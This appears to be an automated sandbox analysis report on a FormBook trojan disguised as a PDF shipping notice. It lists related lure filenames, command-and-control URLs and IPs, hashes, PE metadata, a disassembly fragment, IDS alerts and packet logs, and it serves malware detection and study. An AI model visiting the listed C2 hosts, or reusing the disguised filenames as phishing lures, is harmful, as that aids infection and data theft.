                                                                                                              • www.bfjchonn.com/wkgp/?9rzh=r5bTipvL1HTTWJiBtp2K8HnZFDU224i7HTxLWa9c2vsP4zdxhg+H0Im5NRGa4PGcfm+i&2doHP=jZbXp
                                                                                                              Vergi #U00f6deme faturas#U0131 9 Kas#U0131m 2021 Sal#U0131,pdf.exeGet hashmaliciousBrowse
                                                                                                              • www.eaujeunetuesunique.com/e3rs/?5j_Xr=0lMJyNabEIuqOIYu6FENlOu3MaEwRpRqACIVbnuNhXgO7wan67zzeCUSx/HLaRSQ/RIP&4he=4hiXNDW
                                                                                                              New order #1138.xlsxGet hashmaliciousBrowse
                                                                                                              • www.mambacustomboats.com/fqiq/?cz=oM7C4s4P9Tx5NE8K/7tedYlymorHgm5Kv3M2/2amrfi4uqOFLGFzoT7deI7S8+ml3DPmrQ==&Mx=OTAd
                                                                                                              Drawing & Company Profile.exeGet hashmaliciousBrowse
                                                                                                              • www.spaceameseu.xyz/fg6s/?ETwT=0BZxk6DhNH3LdJ&Nhoxs4=nA5tULqkrawt9pEoOlQQfR/faELPy2pLoS6J6NMTjgTyPZXVoDl3YIO7hrV6abifMfON

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              www.evaccines.comrEC0x536o5.exeGet hashmaliciousBrowse
                                                                                                              • 3.64.163.50
                                                                                                              www.izivente.comDRAFT CI,PL,BL.xlsxGet hashmaliciousBrowse
                                                                                                              • 64.190.62.111
                                                                                                              rEC0x536o5.exeGet hashmaliciousBrowse
                                                                                                              • 64.190.62.111
                                                                                                              Draft CI,PL,BL.xlsxGet hashmaliciousBrowse
                                                                                                              • 64.190.62.111

                                                                                                              ASN

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              UNIFIEDLAYER-AS-1USt 2021.HtMLGet hashmaliciousBrowse
                                                                                                              • 192.185.129.43
                                                                                                              New Order778880.exeGet hashmaliciousBrowse
                                                                                                              • 192.185.167.112
                                                                                                              IyRUJT27dd.exeGet hashmaliciousBrowse
                                                                                                              • 192.185.113.96
                                                                                                              LlDlHiVEJQ.exeGet hashmaliciousBrowse
                                                                                                              • 162.241.24.173
                                                                                                              bomba.armGet hashmaliciousBrowse
                                                                                                              • 162.144.165.114
                                                                                                              PAYMENT COPY FOR YOUR INFORMATION $76,956.exeGet hashmaliciousBrowse
                                                                                                              • 192.185.129.69
                                                                                                              Balance.xlsGet hashmaliciousBrowse
                                                                                                              • 192.185.113.96
                                                                                                              EDYMAN ORDER.vbsGet hashmaliciousBrowse
                                                                                                              • 162.241.148.206
                                                                                                              Scan docs. pdf..................exeGet hashmaliciousBrowse
                                                                                                              • 108.179.232.76
                                                                                                              $24,000.00USD.payment.pdf.Gz.exeGet hashmaliciousBrowse
                                                                                                              • 162.241.169.155
                                                                                                              Pago.xlsGet hashmaliciousBrowse
                                                                                                              • 192.185.113.96
                                                                                                              ZXfpm4fw0q.exeGet hashmaliciousBrowse
                                                                                                              • 192.185.113.96
                                                                                                              vbc (1).exeGet hashmaliciousBrowse
                                                                                                              • 192.185.5.49
                                                                                                              wYW5AsM930.exeGet hashmaliciousBrowse
                                                                                                              • 192.185.17.130
                                                                                                              vbc.exeGet hashmaliciousBrowse
                                                                                                              • 108.167.189.66
                                                                                                              oLoXpXDepS.exeGet hashmaliciousBrowse
                                                                                                              • 192.185.113.96
                                                                                                              arm-20211123-0942Get hashmaliciousBrowse
                                                                                                              • 142.5.239.185
                                                                                                              Payment.xlsGet hashmaliciousBrowse
                                                                                                              • 192.185.113.96
                                                                                                              DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 50.87.150.131
                                                                                                              mDm3flTa40NBzvg.exeGet hashmaliciousBrowse
                                                                                                              • 192.185.84.191
                                                                                                              ROOTNETWORKSUSeh.armGet hashmaliciousBrowse
                                                                                                              • 154.82.151.141
                                                                                                              l1z4rdsQu4D.x86Get hashmaliciousBrowse
                                                                                                              • 154.27.158.217
                                                                                                              d8Hs7X8HGPGet hashmaliciousBrowse
                                                                                                              • 154.27.246.223
                                                                                                              y2NMF6ulOIGet hashmaliciousBrowse
                                                                                                              • 154.82.103.232
                                                                                                              Hilix.armGet hashmaliciousBrowse
                                                                                                              • 154.82.151.120
                                                                                                              document.exeGet hashmaliciousBrowse
                                                                                                              • 154.82.127.19
                                                                                                              yXTRZQmYdrGet hashmaliciousBrowse
                                                                                                              • 154.94.148.183
                                                                                                              Owari.arm7Get hashmaliciousBrowse
                                                                                                              • 154.82.103.252
                                                                                                              JuihXmkZGFGet hashmaliciousBrowse
                                                                                                              • 154.94.148.170
                                                                                                              2gRh8To5o9Get hashmaliciousBrowse
                                                                                                              • 154.27.246.214
                                                                                                              zFDNFIXYHnGet hashmaliciousBrowse
                                                                                                              • 103.211.168.19
                                                                                                              peach.armGet hashmaliciousBrowse
                                                                                                              • 156.236.248.47
                                                                                                              zgV2Uq4fmuGet hashmaliciousBrowse
                                                                                                              • 156.236.225.9
                                                                                                              7fic3HM8I3Get hashmaliciousBrowse
                                                                                                              • 156.236.225.7
                                                                                                              mixazed_20210816-155711.exeGet hashmaliciousBrowse
                                                                                                              • 154.82.111.78
                                                                                                              M8XFTAqveTGet hashmaliciousBrowse
                                                                                                              • 154.82.151.133
                                                                                                              RR8K3UpQdtGet hashmaliciousBrowse
                                                                                                              • 38.240.210.8
                                                                                                              Qka3fi8NpLGet hashmaliciousBrowse
                                                                                                              • 154.82.151.169
                                                                                                              Z7bNxhhS7yGet hashmaliciousBrowse
                                                                                                              • 154.82.151.124

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              37f463bf4616ecd445d4a1937da06e19TT-PRIME USD242,357,59.ppamGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              chase.xlsGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              Statement from QNB.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              private-1915056036.xlsGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              private-1910485378.xlsGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              doc201002124110300200.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              t 2021.HtMLGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              Justificante.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              muhammadbad.htmlGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              MtCsSK9TK2.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              vAsfZhw32P.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              FpYf5EGDO9.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              #U0191ACTU#U0156A_unxsxdxX_f_mMT_312.vbsGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              FhP4JYCU7J.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              ugeLMlEROB.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110
                                                                                                              NtqHVU6GDV.dllGet hashmaliciousBrowse
                                                                                                              • 142.250.186.97
                                                                                                              • 142.250.185.110

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Temp\~DF37AB796C0CD232D7.TMP
                                                                                                              Process:C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16384
                                                                                                              Entropy (8bit):1.5280837450206026
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:GNVdtlevDRZpak7m8llj9myGr0qLjLu3FM:GNVgvckac9my8LjL
                                                                                                              MD5:419FC2EF2A5F8F91499B182A69484E4A
                                                                                                              SHA1:7A4D9A94112A8FEA9067C9B02BF29384141ED15E
                                                                                                              SHA-256:B2ED57A9BB9C772B2F9D21D49EBA91BFD412B3135DAD6EFC05777FAADDA10540
                                                                                                              SHA-512:6A51467436A003C1357B9111D002F87F1A0DB9628C692AD2EA32652F1D12F790271F164B731D81E76665D28A07ED5C31EDEA51A414E4C46B46B074E9962210E4
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):6.490437985451051
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:Arrival Notice, CIA Awb Inv Form.pdf.exe
                                                                                                              File size:214328
                                                                                                              MD5:ff71941571d8930c1125b3931d400d86
                                                                                                              SHA1:0a417bf568a5978777021e433bf4693893facd3e
                                                                                                              SHA256:bf952f1cd44de7bf63c63e502670d3a6a97eca1b5f7fd9981ed0d235351e975f
                                                                                                              SHA512:19ba70c75a615446c3c482d3732b373f85a4622ebc0ef652a7e9b368eb30db1a096d6a4e71cc7c118d7192817c18c6aa84429e6a5e2fadb9e8edad8ed4615528
                                                                                                              SSDEEP:1536:uZVG0Dx+5ddSVTrCH+Gbe99P0ezrHSjetlvrrs2gb16A7OsJ4AdDuZxnRVxekC3S:4G12TrQ4zOC5g7OK4AdD4re3RVa
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.....................................Rich....................PE..L....}.O..........................................@........

                                                                                                              File Icon

                                                                                                              Icon Hash:c4ccccccc4cc9391

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x401598
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:true
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                              DLL Characteristics:
                                                                                                              Time Stamp:0x4FE77DAE [Sun Jun 24 20:50:54 2012 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:0866620dbb47fce5dcf62fd73a28087e

                                                                                                              Authenticode Signature

                                                                                                              Signature Valid:false
                                                                                                              Signature Issuer:E=Princeless@Pauperise9.LA, CN=Determinerede, OU=saddles, O=Organozinc1, L=stikordet, S=albueben, C=GN
                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                              Error Number:-2146762487
                                                                                                              Not Before, Not After
                                                                                                              • 22/11/2021 18:40:02 22/11/2022 18:40:02
                                                                                                              Subject Chain
                                                                                                              • E=Princeless@Pauperise9.LA, CN=Determinerede, OU=saddles, O=Organozinc1, L=stikordet, S=albueben, C=GN
                                                                                                              Version:3
                                                                                                              Thumbprint MD5:7034EF897C224C9C7BDB83E97DFC0132
                                                                                                              Thumbprint SHA-1:EF1AC1E686A6F1DE495F0BFD6280EE73EC06795C
                                                                                                              Thumbprint SHA-256:675A574FC88003464890E2D25C543E3FB3A82739956E09B5D312053E83CDCA9D
                                                                                                              Serial:00

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              push 0041B55Ch
                                                                                                              call 00007F5B809A4985h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              xor byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              inc eax
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add ch, ch
                                                                                                              cld
                                                                                                              aad 89h
                                                                                                              xor ecx, dword ptr [ecx]
                                                                                                              stosb
                                                                                                              dec ebp
                                                                                                              mov ch, 79h
                                                                                                              aas
                                                                                                              pop ss
                                                                                                              xchg eax, edx
                                                                                                              mov dword ptr [00003B11h], eax
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add dword ptr [eax], eax
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              cwde
                                                                                                              and dword ptr [edi], ebx
                                                                                                              add ecx, dword ptr [ebp+75h]
                                                                                                              jnc 00007F5B809A49F3h
                                                                                                              insb
                                                                                                              insd
                                                                                                              popad
                                                                                                              outsb
                                                                                                              imul esi, dword ptr [edi], B1CC0000h
                                                                                                              pop ds
                                                                                                              add eax, dword ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add bh, bh
                                                                                                              int3
                                                                                                              xor dword ptr [eax], eax
                                                                                                              and eax, 2037265Ch
                                                                                                              leave
                                                                                                              dec eax
                                                                                                              push eax
                                                                                                              dec ecx
                                                                                                              test eax, 234F786Ah
                                                                                                              je 00007F5B809A4944h
                                                                                                              xor byte ptr [ecx+55AEB60Ah], bh
                                                                                                              out D9h, eax
                                                                                                              dec esi
                                                                                                              cmp byte ptr [edx+ebx*8], 0000002Dh
                                                                                                              pop ecx
                                                                                                              cmp ecx, dword ptr [eax+3Ah]
                                                                                                              dec edi
                                                                                                              lodsd
                                                                                                              xor ebx, dword ptr [ecx-48EE309Ah]
                                                                                                              or al, 00h
                                                                                                              stosb
                                                                                                              add byte ptr [eax-2Dh], ah
                                                                                                              xchg eax, ebx
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              jno 00007F5B809A492Eh
                                                                                                              add dword ptr [eax], eax
                                                                                                              and eax, 0000000Bh
                                                                                                              push es
                                                                                                              add byte ptr [edx+6Fh], ah
                                                                                                              jc 00007F5B809A49F6h
                                                                                                              jnc 00007F5B809A4993h
                                                                                                              or eax, 41000701h
                                                                                                              jc 00007F5B809A49F9h
                                                                                                              insb
                                                                                                              bound eax, dword ptr [eax]

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2a2740x28.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x6638.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x330000x1538
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x194.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x298800x2a000False0.45206124442data6.79025168082IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .data0x2b0000xe880x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x2c0000x66380x7000False0.391427176339data4.79823535625IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              LOCK0x2ce620x57d6MS Windows icon resource - 6 icons, 48x48, 8 bits/pixel, 32x32, 8 bits/pixelEnglishUnited States
                                                                                                              RT_ICON0x2c71a0x748data
                                                                                                              RT_ICON0x2c3b20x368GLS_BINARY_LSB_FIRST
                                                                                                              RT_GROUP_ICON0x2c3900x22data
                                                                                                              RT_VERSION0x2c1700x220data

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              MSVBVM60.DLL__vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaCyI2, __vbaAryConstruct2, DllFunctionCall, __vbaVarLateMemSt, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaVarCopy, __vbaFpI4, _CIatan, __vbaStrMove, __vbaUI1Str, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaStrCy, __vbaFreeObj, __vbaFreeStr

                                                                                                              Version Infos

                                                                                                              DescriptionData
                                                                                                              Translation0x0400 0x04b0
                                                                                                              InternalNameBEGRLIGHED
                                                                                                              FileVersion1.00
                                                                                                              CompanyNameVerkada
                                                                                                              ProductNameMusalmani7
                                                                                                              ProductVersion1.00
                                                                                                              OriginalFilenameBEGRLIGHED.exe

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              11/24/21-15:09:33.889884ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.201.1.1.1
                                                                                                              11/24/21-15:09:52.881081TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981680192.168.11.2034.102.136.180
                                                                                                              11/24/21-15:09:52.881081TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981680192.168.11.2034.102.136.180
                                                                                                              11/24/21-15:09:52.881081TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981680192.168.11.2034.102.136.180
                                                                                                              11/24/21-15:09:53.115042TCP1201ATTACK-RESPONSES 403 Forbidden804981634.102.136.180192.168.11.20
                                                                                                              11/24/21-15:10:33.708120TCP1201ATTACK-RESPONSES 403 Forbidden804981834.102.136.180192.168.11.20
                                                                                                              11/24/21-15:11:36.580027TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982180192.168.11.2035.198.112.85
                                                                                                              11/24/21-15:11:36.580027TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982180192.168.11.2035.198.112.85
                                                                                                              11/24/21-15:11:36.580027TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982180192.168.11.2035.198.112.85
                                                                                                              11/24/21-15:14:13.467588TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982680192.168.11.20184.168.98.97
                                                                                                              11/24/21-15:14:13.467588TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982680192.168.11.20184.168.98.97
                                                                                                              11/24/21-15:14:13.467588TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982680192.168.11.20184.168.98.97
                                                                                                              11/24/21-15:14:34.005658TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.11.2034.102.136.180
                                                                                                              11/24/21-15:14:34.005658TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.11.2034.102.136.180
                                                                                                              11/24/21-15:14:34.005658TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.11.2034.102.136.180
                                                                                                              11/24/21-15:14:34.176236TCP1201ATTACK-RESPONSES 403 Forbidden804982734.102.136.180192.168.11.20

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 24, 2021 15:07:31.597527027 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:31.597560883 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:31.597742081 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:31.610215902 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:31.610233068 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:31.643487930 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:31.643631935 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:31.643680096 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:31.644188881 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:31.644319057 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:31.789627075 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:31.790343046 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:31.790493965 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:31.793642044 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:31.835985899 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.341270924 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.341454029 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:32.341507912 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.341676950 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:32.341712952 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.341818094 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.341873884 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:32.342020035 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:32.393760920 CET49805443192.168.11.20142.250.185.110
                                                                                                              Nov 24, 2021 15:07:32.393778086 CET44349805142.250.185.110192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.436808109 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.436901093 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.437181950 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.437421083 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.437465906 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.477533102 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.477735043 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.478190899 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.478399992 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.481868982 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.481877089 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.482001066 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.482270956 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.482604027 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.523854017 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.687151909 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.687361956 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.687628984 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.687830925 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.688369989 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.688659906 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.690095901 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.690354109 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.690413952 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.690644979 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.692847967 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.693100929 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.695451975 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.695688009 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.697957039 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.698149920 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.698194027 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.698290110 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.698348045 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.698383093 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.698494911 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.698636055 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.698983908 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.699244976 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.699300051 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.699449062 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.699765921 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.699923038 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.699969053 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.700150967 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.700516939 CET44349806142.250.186.97192.168.11.20
